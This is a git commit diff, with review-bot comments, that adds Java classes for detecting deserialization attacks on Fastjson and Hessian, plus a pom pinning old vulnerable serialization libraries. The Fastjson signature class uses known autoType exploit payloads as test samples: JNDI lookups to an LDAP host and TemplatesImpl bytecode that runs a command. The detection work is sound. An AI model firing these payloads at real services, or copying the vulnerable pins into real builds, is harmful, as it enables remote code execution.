
author
“threedr3am”
committed
Merge branch 'feat/data-feature'
# Conflicts: # pom.xml
2 parents 143b5e5 + 5468097 commit 91f5208

14 files changed

+1078
-0
lines changed

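--- /dev/null
+++ b/feature/pom.xml
@@ -0,0 +1,58 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+<parent>
+<artifactId>learn-java-bug</artifactId>
+<groupId>com.xyh</groupId>
+<version>1.0-SNAPSHOT</version>
+</parent>
+<modelVersion>4.0.0</modelVersion>
+
+<artifactId>feature</artifactId>
+
+<dependencies>
+<dependency>
+<groupId>com.caucho</groupId>
+<artifactId>hessian</artifactId>
+<version>4.0.38</version>
+</dependency>
+
+<dependency>
+<groupId>com.esotericsoftware</groupId>
+<artifactId>kryo</artifactId>
+<version>4.0.0</version>
+</dependency>
+
+<dependency>
+<groupId>com.esotericsoftware.yamlbeans</groupId>
+<artifactId>yamlbeans</artifactId>
+<version>1.09</version>
+</dependency>
+
+<dependency>
+<groupId>org.yaml</groupId>
+<artifactId>snakeyaml</artifactId>
+<version>1.17</version>
+</dependency>
+
+<dependency>
+<groupId>org.jyaml</groupId>
+<artifactId>jyaml</artifactId>
+<version>1.3</version>
+</dependency>
+
+<dependency>
+<groupId>com.thoughtworks.xstream</groupId>
+<artifactId>xstream</artifactId>
+<version>1.4.9</version>
+</dependency>
+
+<dependency>
+<groupId>com.alibaba</groupId>
+<artifactId>fastjson</artifactId>
+<version>1.2.62</version>
+</dependency>
+</dependencies>
+
+</project>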
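Review bot: The `<dependencies>` block pins every library to an old fixed release (hessian 4.0.38, kryo 4.0.0, yamlbeans 1.09, snakeyaml 1.17, jyaml 1.3, xstream 1.4.9, fastjson 1.2.62) with no comment saying why. In a module named `feature` under `learn-java-bug` these look deliberately chosen so the serialization formats under study can be reproduced, but a reader who copies this pom into another build has no way to tell that from the file itself. Add an XML comment directly above `<dependencies>`, e.g. `<!-- Versions deliberately pinned to old releases so the serialization formats studied in this module can be reproduced; not a reference for dependency selection. -->`. The module also declares no `<properties>` for these versions, so a maintainer bumping one of them has to edit each `<version>` by hand.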
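--- /dev/null
+++ b/PATH-NOT-SHOWN/CAS4$1And4$2.java
@@ -0,0 +1,11 @@
+package com.threedr3am.bug.feature;
+
+/**
+*
+* CAS 4.1.x-4.1.6 and 4.1.7-4.2.x 反序列化攻击特征
+*
+* @author threedr3am
+*/
+public class CAS4$1And4$2 {
+
+}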
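Review bot: `CAS4$1And4$2` (line 9) uses `$` in a source-level class name, which the JLS reserves for mechanically generated names and which collides with the `Outer$Inner` binary naming of nested classes in the same package; a plain name such as `Cas41And42` avoids that. The class body is empty, so the Javadoc's description of a CAS 4.1.x/4.2.x deserialization signature is not backed by any code yet. Mark the stub explicitly with `// TODO: signature not implemented yet` inside the class body so the gap is visible to anyone wiring these feature classes together.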
Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
package com.threedr3am.bug.feature;
2+
3+
import java.util.regex.Pattern;
4+
5+
/**
6+
*
7+
* Fastjson autoType 序列化数据特征
8+
*
9+
* @author threedr3am
10+
*/
11+
public class FastjsonSerialization {
12+
13+
static Pattern pattern = Pattern.compile("[\"']@(t|(\\\\u0074)|(\\\\x74))(y|(\\\\u0079)|(\\\\x79))(p|(\\\\u0070)|(\\\\x70))(e|(\\\\u0065)|(\\\\x65))[\"']\\s*?:");
14+
15+
public static void main(String[] args) {
16+
printAndMatch("{\"@type\":\"org.apache.commons.proxy.provider.remoting.SessionBeanProvider\",\"jndiName\":\"ldap://localhost:43658/Calc\",\"Object\":\"a\"}");
17+
printAndMatch("{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADQANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClW\n"
18+
+ "AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBACFM\n"
19+
+ "Y29tL3RocmVlZHIzYW0vYnVnL2Zhc3Rqc29uL0NtZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4v\n"
20+
+ "b3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUv\n"
21+
+ "eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVu\n"
22+
+ "dAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRs\n"
23+
+ "ZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFs\n"
24+
+ "aXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcALQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hh\n"
25+
+ "bGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9k\n"
26+
+ "dG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3Nlcmlh\n"
27+
+ "bGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9h\n"
28+
+ "cGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20v\n"
29+
+ "c3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRs\n"
30+
+ "ZXI7AQAIPGNsaW5pdD4BAAFlAQAVTGphdmEvbGFuZy9UaHJvd2FibGU7AQANU3RhY2tNYXBUYWJs\n"
31+
+ "ZQcAKQEAClNvdXJjZUZpbGUBAAhDbWQuamF2YQwACQAKBwAuDAAvADABADYvQXBwbGljYXRpb25z\n"
32+
+ "L0NhbGN1bGF0b3IuYXBwL0NvbnRlbnRzL01hY09TL0NhbGN1bGF0b3IMADEAMgEAE2phdmEvbGFu\n"
33+
+ "Zy9UaHJvd2FibGUMADMACgEAH2NvbS90aHJlZWRyM2FtL2J1Zy9mYXN0anNvbi9DbWQBAEBjb20v\n"
34+
+ "c3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5z\n"
35+
+ "bGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhj\n"
36+
+ "ZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1\n"
37+
+ "bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEA\n"
38+
+ "D3ByaW50U3RhY2tUcmFjZQAhAAcACAAAAAAABAABAAkACgABAAsAAAAvAAEAAQAAAAUqtwABsQAA\n"
39+
+ "AAIADAAAAAYAAQAAABAADQAAAAwAAQAAAAUADgAPAAAAAQAQABEAAgALAAAAPwAAAAMAAAABsQAA\n"
40+
+ "AAIADAAAAAYAAQAAAB0ADQAAACAAAwAAAAEADgAPAAAAAAABABIAEwABAAAAAQAUABUAAgAWAAAA\n"
41+
+ "BAABABcAAQAQABgAAgALAAAASQAAAAQAAAABsQAAAAIADAAAAAYAAQAAACIADQAAACoABAAAAAEA\n"
42+
+ "DgAPAAAAAAABABIAEwABAAAAAQAZABoAAgAAAAEAGwAcAAMAFgAAAAQAAQAXAAgAHQAKAAEACwAA\n"
43+
+ "AGEAAgABAAAAErgAAhIDtgAEV6cACEsqtgAGsQABAAAACQAMAAUAAwAMAAAAFgAFAAAAFAAJABcA\n"
44+
+ "DAAVAA0AFgARABgADQAAAAwAAQANAAQAHgAfAAAAIAAAAAcAAkwHACEEAAEAIgAAAAIAIw==\"],\"_name\":\"a.b\",\"_tfactory\":{},\"_outputProperties\":{}}");
45+
printAndMatch("{,,,\"@type\" :\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}");
46+
printAndMatch("{'@type':\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"ldap://localhost:43658/Calc\"}");
47+
printAndMatch("[{'@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658/Calc\",\"autoCommit\":true}]");
48+
}
49+
50+
private static void printAndMatch(String json) {
51+
System.out.println("------------------------------------------------------------");
52+
System.out.println(json);
53+
System.out.println(pattern.matcher(json).find());
54+
}
55+
}
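Review bot: `static Pattern pattern` (line 13) is mutable and package-visible; a compiled regex that never changes should be `private static final Pattern PATTERN = Pattern.compile(...)`. `printAndMatch` (lines 50–54) only prints the result of `find()`, so `main` is a manual eyeball check rather than a test; giving it an expected value, `private static void printAndMatch(String json, boolean expected)` with `assert pattern.matcher(json).find() == expected;`, would make a regression in the signature fail loudly. The samples in `main` are all inputs the signature is meant to flag, so a comment above `main`, `// every sample below is expected to match the autoType signature`, would tell a reader what a `false` in the output means.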
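--- /dev/null
+++ b/PATH-NOT-SHOWN/HessianSerialization.java
@@ -0,0 +1,222 @@
+package com.threedr3am.bug.feature;
+
+import com.caucho.hessian.io.AbstractHessianOutput;
+import com.caucho.hessian.io.HessianOutput;
+import com.caucho.hessian.io.HessianProtocolException;
+import com.caucho.hessian.io.Serializer;
+import com.caucho.hessian.io.SerializerFactory;
+import com.caucho.hessian.io.UnsafeSerializer;
+import com.caucho.hessian.io.WriteReplaceSerializer;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.Serializable;
+import java.util.HashMap;
+import java.util.Map;
+
+/**
+*
+* Hessian序列化数据特征
+*
+* 4d 74 00 ... 7a
+*
+* @author threedr3am
+*/
+public class HessianSerialization implements Serializable {
+
+public static void main(String[] args) throws IOException {
+printAndMatch(object1());
+printAndMatch(object1_());
+printAndMatch(object2());
+printAndMatch(object2_());
+printAndMatch(object3());
+printAndMatch(object3_());
+printAndMatch(object4());
+printAndMatch(object4_());
+printAndMatch(object5());
+printAndMatch(object5_());
+printAndMatch(object6());
+printAndMatch(object6_());
+}
+
+private static void printAndMatch(byte[] bytes) {
+StringBuilder stringBuilder = new StringBuilder();
+for (int i = 0; i < bytes.length; i++) {
+stringBuilder.append(String.format("\\x%x ", bytes[i]));
+}
+System.out.println(stringBuilder.toString());
+System.out.println(stringBuilder.toString().replaceAll(" ", "").contains("\\x4d\\x74\\x0"));
+}
+
+private static byte[] object1() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+sf.setAllowNonSerializable(true);
+out.setSerializerFactory(sf);
+out.writeString("test");
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object1_() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+out.writeString("test");
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object1_2() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+out.writeString("threedr3am");
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object2() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+sf.setAllowNonSerializable(true);
+out.setSerializerFactory(sf);
+out.writeObject(new A());
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object2_() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+out.writeObject(new A());
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object3() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+sf.setAllowNonSerializable(true);
+out.setSerializerFactory(sf);
+out.writeObject(new B(new A()));
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object3_() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+out.writeObject(new B(new A()));
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object4() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+sf.setAllowNonSerializable(true);
+out.setSerializerFactory(sf);
+out.writeObject(new HessianSerialization());
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object4_() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+out.writeObject(new HessianSerialization());
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object5() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+sf.setAllowNonSerializable(true);
+out.setSerializerFactory(sf);
+Map<String, String> map = new HashMap<>();
+map.put("test", "test");
+map.put("foo", "foo");
+out.writeObject(map);
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object5_() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+Map<String, String> map = new HashMap<>();
+map.put("test", "test");
+map.put("foo", "foo");
+out.writeObject(map);
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object6() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
+sf.setAllowNonSerializable(true);
+out.setSerializerFactory(sf);
+Map<String, String> map = new HashMap<>();
+map.put("test", "test");
+out.writeObject(map);
+out.close();
+return bos.toByteArray();
+}
+
+private static byte[] object6_() throws IOException {
+ByteArrayOutputStream bos = new ByteArrayOutputStream();
+AbstractHessianOutput out = new HessianOutput(bos);
+Map<String, String> map = new HashMap<>();
+map.put("test", "test");
+out.writeObject(map);
+out.close();
+return bos.toByteArray();
+}
+
+static class A implements Serializable {}
+static class B implements Serializable {
+A a;
+
+public B(A a) {
+this.a = a;
+}
+}
+
+public static class NoWriteReplaceSerializerFactory extends SerializerFactory {
+
+/**
+* {@inheritDoc}
+*
+* @see com.caucho.hessian.io.SerializerFactory#getObjectSerializer(java.lang.Class)
+*/
+@Override
+public Serializer getObjectSerializer ( Class<?> cl ) throws HessianProtocolException {
+return super.getObjectSerializer(cl);
+}
+
+
+/**
+* {@inheritDoc}
+*
+* @see com.caucho.hessian.io.SerializerFactory#getSerializer(java.lang.Class)
+*/
+@Override
+public Serializer getSerializer ( Class cl ) throws HessianProtocolException {
+Serializer serializer = super.getSerializer(cl);
+
+if ( serializer instanceof WriteReplaceSerializer) {
+return UnsafeSerializer.create(cl);
+}
+return serializer;
+}
+
+}
+
+
+}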
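Review bot: `printAndMatch` (lines 41–48) formats each byte with `"\\x%x "`, which prints single-digit values without a leading zero, so the final `contains("\\x4d\\x74\\x0")` accepts any third byte from 0x00 through 0x0f rather than the `4d 74 00` prefix the class Javadoc names. Use `stringBuilder.append(String.format("\\x%02x ", bytes[i]));` and compare against `"\\x4d\\x74\\x00"` so the check is exact; `%x` already renders a negative `byte` as its unsigned two-digit value, so only the low-value case changes. Separately, `object1_2` (line 69) is never called from `main`, and `NoWriteReplaceSerializerFactory.getObjectSerializer` (lines 198–201) only delegates to `super`, so both are dead weight unless a comment explains why they are kept. The empty `A`/`B` classes and the sampling methods would also benefit from a one-line comment above `main` stating that the `objectN` variants go through the custom factory and the `objectN_` variants use the default one, since that is the comparison the output is meant to show.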
